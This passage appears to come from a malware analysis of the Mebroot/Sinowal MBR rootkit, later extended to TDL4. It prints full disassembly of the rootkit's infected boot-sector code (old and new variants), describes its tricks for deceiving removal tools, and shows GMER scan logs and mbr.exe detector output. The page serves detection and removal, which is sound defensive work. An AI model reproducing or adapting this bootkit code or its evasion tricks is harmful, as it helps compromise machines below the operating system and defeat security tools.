    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD295A 3.tmp: nt!IoBuildSynchronousFsdRequest( IRP_MJ_WRITE, "\Driver\Disk", 0x819BD5A0, 512, 0000000000000000 )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2968 3.tmp: nt!IofCallDriver( "\Driver\Disk", (IRP)0x819748C0 [IRP_MJ_WRITE ] )
    
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2982 3.tmp: nt!KeWaitForSingleObject
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2B37 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_WRITE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    {FBE1D620-5418-4aae-A0F0-316D590663A1} F9FD2A64 3.tmp: nt!IofCompleteRequest( (IRP)0x81B27608 [IRP_MJ_CLOSE \Driver\{FBE1D620-5418-4aae-A0F0-316D590663A1}] )
    

    Conclusion


    When we are thinking, how to ensure protection against this threat, we should remember, that BIOS MBR protections and all software based solutions could failed, when the attacker will move malicious code from the MBR to the partition boot record. The partition boot record has the same potential like MBR and also could be used to compromise the OS.

    Hopefully, new technologies like TPM will help improve the security.




    Update

    Mar 26th, 2008

    The author of the rootkit released another improved version of the malware. The rootkit gang decided to continue "mouse and cat game", and to be more effective against AV scanners and removal tools, the changes concerning the MBR sector code, as well as now malware uses few tricks to cheat removal tools .

    old rootkit MBR code

    new rootkit MBR code

    cs:7c00 (01) fa                       CLI
    cs:7c01 (02) 33db                     XOR BX, BX
    cs:7c03 (02) 8ed3                     MOV SS, BX
    cs:7c05 (05) 36 8926 fe7b             MOV SS:[0x7bfe], SP
    cs:7c0a (03) bc fe7b                  MOV SP, 0x7bfe
    cs:7c0d (01) 1e                       PUSH DS
    cs:7c0e (02) 66 60                    PUSHAD
    cs:7c10 (01) fc                       CLD
    cs:7c11 (02) 8edb                     MOV DS, BX
    cs:7c13 (03) be 1304                  MOV SI, 0x413
    cs:7c16 (03) 832c 02                  SUB WORD [SI], 0x2
    cs:7c19 (01) ad                       LODSW
    cs:7c1a (03) c1e0 06                  SHL AX, 0x6
    cs:7c1d (02) 8ec0                     MOV ES, AX
    cs:7c1f (03) be 007c                  MOV SI, 0x7c00
    cs:7c22 (02) 33ff                     XOR DI, DI
    cs:7c24 (03) b9 0001                  MOV CX, 0x100
    cs:7c27 (02) f3 a5                    REP MOVSW
    cs:7c29 (03) b8 0202                  MOV AX, 0x202
    cs:7c2c (02) b1 3d                    MOV CL, 0x3d
    cs:7c2e (03) ba 8000                  MOV DX, 0x80
    cs:7c31 (02) 8bdf                     MOV BX, DI
    cs:7c33 (02) cd 13                    INT 0x13
    cs:7c35 (02) 33db                     XOR BX, BX
    
     
     
    cs:7c37 (04) 66 8b47 4c               MOV EAX, [BX+0x4c]
    cs:7c3b (05) 66 26 a3 7300            MOV ES:[0x73], EAX
    cs:7c40 (05) c747 4c 6600             MOV WORD [BX+0x4c], 0x66
    cs:7c45 (03) 8c47 4e                  MOV WORD [BX+0x4e], ES
    cs:7c48 (01) 06                       PUSH ES
    cs:7c49 (03) 68 4d00                  PUSH 0x4d
    cs:7c4c (01) cb                       RETF
    cs:7c4d (01) fb                       STI
    cs:7c4e (02) 8ec3                     MOV ES, BX
    cs:7c50 (03) b8 0102                  MOV AX, 0x201
    cs:7c53 (03) b9 3f00                  MOV CX, 0x3f
    cs:7c56 (03) ba 8000                  MOV DX, 0x80
    cs:7c59 (02) b7 7c                    MOV BH, 0x7c
    cs:7c5b (02) cd 13                    INT 0x13
    cs:7c5d (02) 66 61                    POPAD
    cs:7c5f (01) 1f                       POP DS
    cs:7c60 (01) 5c                       POP SP
    cs:7c61 (05) ea 007c 0000             JMP FAR 0x0:0x7c00
    cs:7c66 (01) 9c                       PUSHF
    cs:7c67 (03) 80fc 42                  CMP AH, 0x42
    cs:7c6a (02) 74 0b                    JZ 0x7c77
    cs:7c6c (03) 80fc 02                  CMP AH, 0x2
    cs:7c6f (02) 74 06                    JZ 0x7c77
    cs:7c71 (01) 9d                       POPF
    cs:7c72 (05) ea 0000 0000             JMP FAR 0x0:0x0
    cs:7c77 (05) 2e 8826 9000             MOV CS:[0x90], AH
    cs:7c7c (01) 9d                       POPF
    cs:7c7d (01) 9c                       PUSHF
    cs:7c7e (05) 2e ff1e 7300             CALL FAR WORD CS:[0x73]
    cs:7c83 (04) 0f82 9d00                JB 0x7d24
    cs:7c87 (01) 9c                       PUSHF
    cs:7c88 (01) fa                       CLI
    cs:7c89 (01) 06                       PUSH ES
    cs:7c8a (02) 66 60                    PUSHAD
    cs:7c8c (01) fc                       CLD
    cs:7c8d (02) b4 00                    MOV AH, 0x0
    cs:7c8f (02) b5 00                    MOV CH, 0x0
    cs:7c91 (03) 80fd 42                  CMP CH, 0x42
    cs:7c94 (02) 75 04                    JNZ 0x7c9a
    cs:7c96 (01) ad                       LODSW
    cs:7c97 (01) ad                       LODSW
    cs:7c98 (02) c41c                     LES BX, WORD [SI]
    cs:7c9a (02) 85c0                     TEST AX, AX
    cs:7c9c (02) 75 01                    JNZ 0x7c9f
    cs:7c9e (01) 40                       INC AX
    cs:7c9f (02) 8bc8                     MOV CX, AX
    cs:7ca1 (02) b0 8b                    MOV AL, 0x8b
    cs:7ca3 (03) c1e1 09                  SHL CX, 0x9
    cs:7ca6 (02) 8bfb                     MOV DI, BX
    cs:7ca8 (01) 60                       PUSHA
    cs:7ca9 (02) f2 ae                    REPNZ SCASB
    cs:7cab (02) 75 47                    JNZ 0x7cf4
    cs:7cad (08) 66 26 813d f085f674      CMP DWORD ES:[DI], 0x74f685f0
    cs:7cb5 (02) 75 f2                    JNZ 0x7ca9
    cs:7cb7 (06) 26 817d 05 803d          CMP WORD ES:[DI+0x5], 0x3d80
    cs:7cbd (02) 75 ea                    JNZ 0x7ca9
    cs:7cbf (04) 26 8a45 04               MOV AL, ES:[DI+0x4]
    cs:7cc3 (02) 3c 21                    CMP AL, 0x21
    cs:7cc5 (02) 74 04                    JZ 0x7ccb
    cs:7cc7 (02) 3c 22                    CMP AL, 0x22
    cs:7cc9 (02) 75 de                    JNZ 0x7ca9
    cs:7ccb (03) be 0b02                  MOV SI, 0x20b
    cs:7cce (04) 2e 803c 00               CMP BYTE CS:[SI], 0x0
    cs:7cd2 (02) 75 20                    JNZ 0x7cf4
    cs:7cd4 (03) 2e 8804                  MOV CS:[SI], AL
    cs:7cd7 (06) 26 c745 ff ff15          MOV WORD ES:[DI-0x1], 0x15ff
    cs:7cdd (03) 66 8cc8                  MOV EAX, CS
    cs:7ce0 (04) 66 c1e0 04               SHL EAX, 0x4
    cs:7ce4 (03) 05 0002                  ADD AX, 0x200
    cs:7ce7 (05) 66 2e a3 fc01            MOV CS:[0x1fc], EAX
    cs:7cec (03) 2d 0400                  SUB AX, 0x4
    cs:7cef (05) 66 26 8945 01            MOV ES:[DI+0x1], EAX
    cs:7cf4 (01) 61                       POPA
    cs:7cf5 (02) b0 83                    MOV AL, 0x83
    cs:7cf7 (02) f2 ae                    REPNZ SCASB
    cs:7cf9 (02) 75 25                    JNZ 0x7d20
    cs:7cfb (08) 66 26 813d c402e900      CMP DWORD ES:[DI], 0xe902c4
    cs:7d03 (02) 75 f2                    JNZ 0x7cf7
    cs:7d05 (09) 66 26 817d 04 00e9fdff   CMP DWORD ES:[DI+0x4], 0xfffde900
    cs:7d0e (02) 75 e7                    JNZ 0x7cf7
    cs:7d10 (09) 66 26 c745 fc 90909083   MOV DWORD ES:[DI-0x4], 0x83909090
    cs:7d19 (05) 26 8365 06 00            AND WORD ES:[DI+0x6], 0x0
    cs:7d1e (02) eb d7                    JMP 0x7cf7
    cs:7d20 (02) 66 61                    POPAD
    cs:7d22 (01) 07                       POP ES
    cs:7d23 (01) 9d                       POPF
    cs:7d24 (03) ca 0200                  RETF 0x2
    
    cs:7c00 (01) fa                       CLI
    cs:7c01 (02) 33db                     XOR BX, BX
    cs:7c03 (02) 8ed3                     MOV SS, BX
    cs:7c05 (05) 36 8926 fe7b             MOV SS:[0x7bfe], SP
    cs:7c0a (03) bc fe7b                  MOV SP, 0x7bfe
    cs:7c0d (01) 1e                       PUSH DS
    cs:7c0e (02) 66 60                    PUSHAD
    cs:7c10 (01) fc                       CLD
    cs:7c11 (02) 8edb                     MOV DS, BX
    cs:7c13 (03) be 1304                  MOV SI, 0x413
    cs:7c16 (03) 832c 02                  SUB WORD [SI], 0x2
    cs:7c19 (01) ad                       LODSW
    cs:7c1a (03) c1e0 06                  SHL AX, 0x6
    cs:7c1d (02) 8ec0                     MOV ES, AX
    cs:7c1f (03) be 007c                  MOV SI, 0x7c00
    cs:7c22 (02) 33ff                     XOR DI, DI
    cs:7c24 (03) b9 0001                  MOV CX, 0x100
    cs:7c27 (02) f3 a5                    REP MOVSW
    cs:7c29 (03) b8 0202                  MOV AX, 0x202
    cs:7c2c (02) b1 3d                    MOV CL, 0x3d
    cs:7c2e (03) ba 8000                  MOV DX, 0x80
    cs:7c31 (02) 8bdf                     MOV BX, DI
    cs:7c33 (02) cd 13                    INT 0x13
    cs:7c35 (02) 33db                     XOR BX, BX
    
    cs:7c37 (01) 90                       NOP
     
    cs:7c38 (04) 66 8b47 4c               MOV EAX, [BX+0x4c]
    cs:7c3c (05) 66 26 a3 7400            MOV ES:[0x74], EAX
    cs:7c41 (05) c747 4c 6700             MOV WORD [BX+0x4c], 0x67
    cs:7c46 (03) 8c47 4e                  MOV WORD [BX+0x4e], ES
    cs:7c49 (01) 06                       PUSH ES
    cs:7c4a (03) 68 4e00                  PUSH 0x4e
    cs:7c4d (01) cb                       RETF
    cs:7c4e (01) fb                       STI
    cs:7c4f (02) 8ec3                     MOV ES, BX
    cs:7c51 (03) b8 0102                  MOV AX, 0x201
    cs:7c54 (03) b9 3f00                  MOV CX, 0x3f
    cs:7c57 (03) ba 8000                  MOV DX, 0x80
    cs:7c5a (02) b7 7c                    MOV BH, 0x7c
    cs:7c5c (02) cd 13                    INT 0x13
    cs:7c5e (02) 66 61                    POPAD
    cs:7c60 (01) 1f                       POP DS
    cs:7c61 (01) 5c                       POP SP
    cs:7c62 (05) ea 007c 0000             JMP FAR 0x0:0x7c00
    cs:7c67 (01) 9c                       PUSHF
    cs:7c68 (03) 80fc 42                  CMP AH, 0x42
    cs:7c6b (02) 74 0b                    JZ 0x7c78
    cs:7c6d (03) 80fc 02                  CMP AH, 0x2
    cs:7c70 (02) 74 06                    JZ 0x7c78
    cs:7c72 (01) 9d                       POPF
    cs:7c73 (05) ea 0000 0000             JMP FAR 0x0:0x0
    cs:7c78 (05) 2e 8826 9100             MOV CS:[0x91], AH
    cs:7c7d (01) 9d                       POPF
    cs:7c7e (01) 9c                       PUSHF
    cs:7c7f (05) 2e ff1e 7400             CALL FAR WORD CS:[0x74]
    cs:7c84 (04) 0f82 9d00                JB 0x7d25
    cs:7c88 (01) 9c                       PUSHF
    cs:7c89 (01) fa                       CLI
    cs:7c8a (01) 06                       PUSH ES
    cs:7c8b (02) 66 60                    PUSHAD
    cs:7c8d (01) fc                       CLD
    cs:7c8e (02) b4 00                    MOV AH, 0x0
    cs:7c90 (02) b5 00                    MOV CH, 0x0
    cs:7c92 (03) 80fd 42                  CMP CH, 0x42
    cs:7c95 (02) 75 04                    JNZ 0x7c9b
    cs:7c97 (01) ad                       LODSW
    cs:7c98 (01) ad                       LODSW
    cs:7c99 (02) c41c                     LES BX, WORD [SI]
    cs:7c9b (02) 85c0                     TEST AX, AX
    cs:7c9d (02) 75 01                    JNZ 0x7ca0
    cs:7c9f (01) 40                       INC AX
    cs:7ca0 (02) 8bc8                     MOV CX, AX
    cs:7ca2 (02) b0 8b                    MOV AL, 0x8b
    cs:7ca4 (03) c1e1 09                  SHL CX, 0x9
    cs:7ca7 (02) 8bfb                     MOV DI, BX
    cs:7ca9 (01) 60                       PUSHA
    cs:7caa (02) f2 ae                    REPNZ SCASB
    cs:7cac (02) 75 47                    JNZ 0x7cf5
    cs:7cae (08) 66 26 813d f085f674      CMP DWORD ES:[DI], 0x74f685f0
    cs:7cb6 (02) 75 f2                    JNZ 0x7caa
    cs:7cb8 (06) 26 817d 05 803d          CMP WORD ES:[DI+0x5], 0x3d80
    cs:7cbe (02) 75 ea                    JNZ 0x7caa
    cs:7cc0 (04) 26 8a45 04               MOV AL, ES:[DI+0x4]
    cs:7cc4 (02) 3c 21                    CMP AL, 0x21
    cs:7cc6 (02) 74 04                    JZ 0x7ccc
    cs:7cc8 (02) 3c 22                    CMP AL, 0x22
    cs:7cca (02) 75 de                    JNZ 0x7caa
    cs:7ccc (03) be 0b02                  MOV SI, 0x20b
    cs:7ccf (04) 2e 803c 00               CMP BYTE CS:[SI], 0x0
    cs:7cd3 (02) 75 20                    JNZ 0x7cf5
    cs:7cd5 (03) 2e 8804                  MOV CS:[SI], AL
    cs:7cd8 (06) 26 c745 ff ff15          MOV WORD ES:[DI-0x1], 0x15ff
    cs:7cde (03) 66 8cc8                  MOV EAX, CS
    cs:7ce1 (04) 66 c1e0 04               SHL EAX, 0x4
    cs:7ce5 (03) 05 0002                  ADD AX, 0x200
    cs:7ce8 (05) 66 2e a3 fc01            MOV CS:[0x1fc], EAX
    cs:7ced (03) 2d 0400                  SUB AX, 0x4
    cs:7cf0 (05) 66 26 8945 01            MOV ES:[DI+0x1], EAX
    cs:7cf5 (01) 61                       POPA
    cs:7cf6 (02) b0 83                    MOV AL, 0x83
    cs:7cf8 (02) f2 ae                    REPNZ SCASB
    cs:7cfa (02) 75 25                    JNZ 0x7d21
    cs:7cfc (08) 66 26 813d c402e900      CMP DWORD ES:[DI], 0xe902c4
    cs:7d04 (02) 75 f2                    JNZ 0x7cf8
    cs:7d06 (09) 66 26 817d 04 00e9fdff   CMP DWORD ES:[DI+0x4], 0xfffde900
    cs:7d0f (02) 75 e7                    JNZ 0x7cf8
    cs:7d11 (09) 66 26 c745 fc 90909083   MOV DWORD ES:[DI-0x4], 0x83909090
    cs:7d1a (05) 26 8365 06 00            AND WORD ES:[DI+0x6], 0x0
    cs:7d1f (02) eb d7                    JMP 0x7cf8
    cs:7d21 (02) 66 61                    POPAD
    cs:7d23 (01) 07                       POP ES
    cs:7d24 (01) 9d                       POPF
    cs:7d25 (03) ca 0200                  RETF 0x2
    

    To deceive few available detection/removal tools ( including GMER ) new version of rootkit modifies original pointers to CLASSPNP!ClassReadWrite in CLASSPNP.SYS!ClassInitialize function and pointers of \Device\CdRom0 MajorFunction table. The previous version of GMER finds original pointer of CLASSPNP!ClassReadWrite in \Device\CdRom0 MajorFunction table, so now, it cannot read infected MBR.

    However, all these new malware tricks will imply more changes visible in the log - see below old GMER 1.0.12 scan.

    GMER 1.0.12.12010 - http://www.gmer.net
    Rootkit scan 2008-03-26 09:01:20
    Windows 5.1.2600 Dodatek Service Pack 2
    
    
    ---- Kernel code sections - GMER 1.0.12 ----
    
    PAGE    CLASSPNP.SYS!ClassInitialize + F4                                  F9A934B2 4 Bytes  [ 7E, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + FF                                  F9A934BD 4 Bytes  [ 28, 24, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 10A                                 F9A934C8 4 Bytes  [ 90, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 111                                 F9A934CF 4 Bytes  [ 84, 78, 82, 81 ]
    PAGE    CLASSPNP.SYS!ClassInitialize + 118                                 F9A934D6 4 Bytes  [ 8A, 78, 82, 81 ]
    PAGE    ...                                                                
    
    ---- Devices - GMER 1.0.12 ----
    
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_CREATE                         8182787E
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_CLOSE                          8182787E
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_READ                           81822428
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_WRITE                          81822428
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_FLUSH_BUFFERS                  81827890
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_DEVICE_CONTROL                 8182788A
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_INTERNAL_DEVICE_CONTROL        81827884
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_SHUTDOWN                       81827890
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_POWER                          8182789C
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_SYSTEM_CONTROL                 818278A2
    Device  \Driver\Cdrom \Device\CdRom0 IRP_MJ_PNP                            81827896
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CREATE                   8182787E
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_CLOSE                    8182787E
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_READ                     81822428
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_WRITE                    81822428
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_FLUSH_BUFFERS            81827890
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_DEVICE_CONTROL           8182788A
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_INTERNAL_DEVICE_CONTROL  81827884
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SHUTDOWN                 81827890
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_POWER                    8182789C
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_SYSTEM_CONTROL           818278A2
    Device  \Driver\Disk \Device\Harddisk0\DR0 IRP_MJ_PNP                      81827896
    
    ---- Threads - GMER 1.0.12 ----
    
    Thread  4:444                                                              81827BF6
    Thread  4:1672                                                             818299A0
    Thread  4:1680                                                             81821E5C
    Thread  4:480                                                              81827F38
    Thread  4:464                                                              8185A0A0
    Thread  4:468                                                              818471A0
    Thread  4:488                                                              8188FDD0
    Thread  4:1524                                                             81833220
    
    ---- EOF - GMER 1.0.12 ----
    

    Detection and removal


    To detect/remove this rootkit, please use latest version of mbr.exe tool or GMER.

    Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net
    
    device: opened successfully
    user: MBR read successfully
    kernel: MBR read successfully
    MBR rootkit infection detected !
    MBR INT 0x13 hook detected !
    malicious code @ sector 0x3fdc80 size 0x1ca !
    copy of MBR has been found in sector 62 !
    original MBR restored successfully !
    

    All possible options are available after running command: "mbr -?"

    Stealth MBR rootkit detector 0.2.2 by Gmer, http://www.gmer.net
    
    Usage: mbr.exe [options]
      -f                                          - fix mbr 
      -c start_sector size_in_sectors filename    - copy selected sectors to file
    
    samples of usage:
    
      mbr.exe -c 0 1 copy_of_sector_00
      mbr.exe -c 0x3fdc80 0x1ca copy_of_mbr_rk
    



    Update

    April 15th, 2009

    To detect and remove latest variant of rootkit please use mbr.exe version 0.3.1 or newer.
    GMER 1.0.15.14966 - http://www.gmer.net
    Rootkit scan 2009-04-05 17:37:42
    Windows 5.1.2600 Service Pack 1
    
    ---- Devices - GMER 1.0.15 ----
    
    Device  \Driver\atapi \Device\Ide\IdePort0                                                        813A9560
    Device  \Driver\atapi \Device\Ide\IdeDeviceP0T0L0-3                                               813A9560
    Device  \Driver\atapi \Device\Ide\IdePort1                                                        813A9560
    Device  \Driver\atapi \Device\Ide\IdeDeviceP1T0L0-e                                               813A9560
    
    ---- Threads - GMER 1.0.15 ----
    
    Thread  System [4:1672]                                                                           813DA300
    Thread  System [4:1676]                                                                           813C69F6
    Thread  System [4:1692]                                                                           813F8387
    Thread  System [4:1700]                                                                           813C9971
    Thread  System [4:1080]                                                                           813DA300
    Thread  System [4:1084]                                                                           813C69F6
    Thread  System [4:1016]                                                                           813F8387
    Thread  System [4:1108]                                                                           813C9971
    
    ---- EOF - GMER 1.0.15 ----
    
    C:\>mbr.exe -t
    Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.6 by Gmer, http://www.gmer.net
    
    device: opened successfully
    user: MBR read successfully
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x85938E90]<< 
    kernel: MBR read successfully
    detected MBR rootkit hooks:
    \Driver\atapi -> 0x85938e90
    \Device\Harddisk0\DR0 -> ParseProcedure -> 0x8593fc20
    NDIS: Intel(R) 82566DM-2 Gigabit Network Connection -> SendCompleteHandler -> 0x8596e700
    Warning: possible MBR rootkit infection !
    copy of MBR has been found in sector 0x0100A757 
    malicious code @ sector 0x0100A75A !
    PE file found in sector at 0x0100A770 !
    MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.
    
    

    Update 0.4.1 added TDL4 detection

    October 28th, 2010

    C:\>mbr -t -s
    Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.1 by Gmer, http://www.gmer.net
    Windows 5.1.2600 Disk: Maxtor_6Y120P0 rev.YAR41BW0 -> \Device\Ide\IdePort0
    
    device: opened successfully
    user: MBR read successfully
    
    Disk trace:
    called modules: ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys hal.dll >>UNKNOWN [0x866DB566]<<
    _asm { PUSH EBP; MOV EBP, ESP; PUSH ECX; MOV EAX, [EBP+0x8]; CMP EAX, [0x866e1624]; MOV EAX, [0x866e16a0]; PUSH EBX; PUSH ESI; MOV ESI, [EBP+0xc]; MOV EBX, [ESI+0x60]; PUSH EDI; JNZ 0x20; MOV [EBP+0x8], EAX; }
    1 nt!IofCallDriver[0x804E13B9] -> \Device\Harddisk0\DR0[0x8673CAB8]
    3 CLASSPNP[0xF788FFD7] -> nt!IofCallDriver[0x804E13B9] -> \Device\0000005f[0x8677EE88]
    5 ACPI[0xF77E6620] -> nt!IofCallDriver[0x804E13B9] -> [0x86763D98]
    \Driver\atapi[0x86716270] -> IRP_MJ_CREATE -> 0x866DB566
    kernel: MBR read successfully
    _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; MOV ES, AX; MOV DS, AX; MOV SI, 0x7c00; MOV DI, 0x600; MOV CX, 0x200; CLD ; REP MOVSB ; PUSH AX; PUSH 0x61c; RETF ; STI ; PUSHA ; MOV CX, 0x137; MOV BP, 0x62a; ROR BYTE [BP+0x0], CL; INC BP; }
    detected hooks:
    \Device\Ide\IdeDeviceP0T0L0-3 -> \??\IDE#DiskMaxtor_6Y120P0__________________________YAR41BW0#335930334d57455920
    2020202020202020202020#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} device not found
    \Driver\atapi DriverStartIo -> 0x866DB3B2
    user != kernel MBR !!!
    sectors 240121726 (+241): user != kernel
    Warning: possible TDL4 rootkit infection !
    TDL4 rootkit infection detected ! Use: "mbr.exe -f" to fix.
    
    C:\>mbr -t -s
    Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.2 by Gmer, http://www.gmer.net
    Windows 5.1.2600 Disk: ST3250620A rev.3.AAE -> Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3 
    
    device: opened successfully
    user: MBR read successfully
    
    Disk trace:
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x813F4F80]<< 
    _asm { PUSH EBX; PUSH EDI; PUSH ESI; SUB ESP, 0x430; MOV DWORD [ESP+0x278], 0x39; MOV [ESP+0x204], EAX;  }
    1 ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Harddisk0\DR0[0x8165C030]
    3 CLASSPNP[0xF99DD05B] -> ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Ide\IdeDeviceP0T0L0-3[0x818003E8]
    \Driver\atapi[0x81800B30] -> IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0x813F4F80
    kernel: MBR read successfully
    _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; STI ; PUSH AX; POP ES; PUSH AX; POP DS; CLD ; MOV SI, 0x7c1b; MOV DI, 0x61b; PUSH AX; PUSH DI; MOV CX, 0x1e5; REP MOVSB ; RETF ; MOV BP, 0x7be; MOV CL, 0x4; CMP [BP+0x0], CH; JL 0x2e; JNZ 0x3a;  }
    detected disk devices:
    detected hooks:
    \Driver\atapi -> 0x813f4f80
    NDIS: AMD PCNET Family PCI Ethernet Adapter -> SendCompleteHandler -> 0x81427a20
    user != kernel MBR !!!
    MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.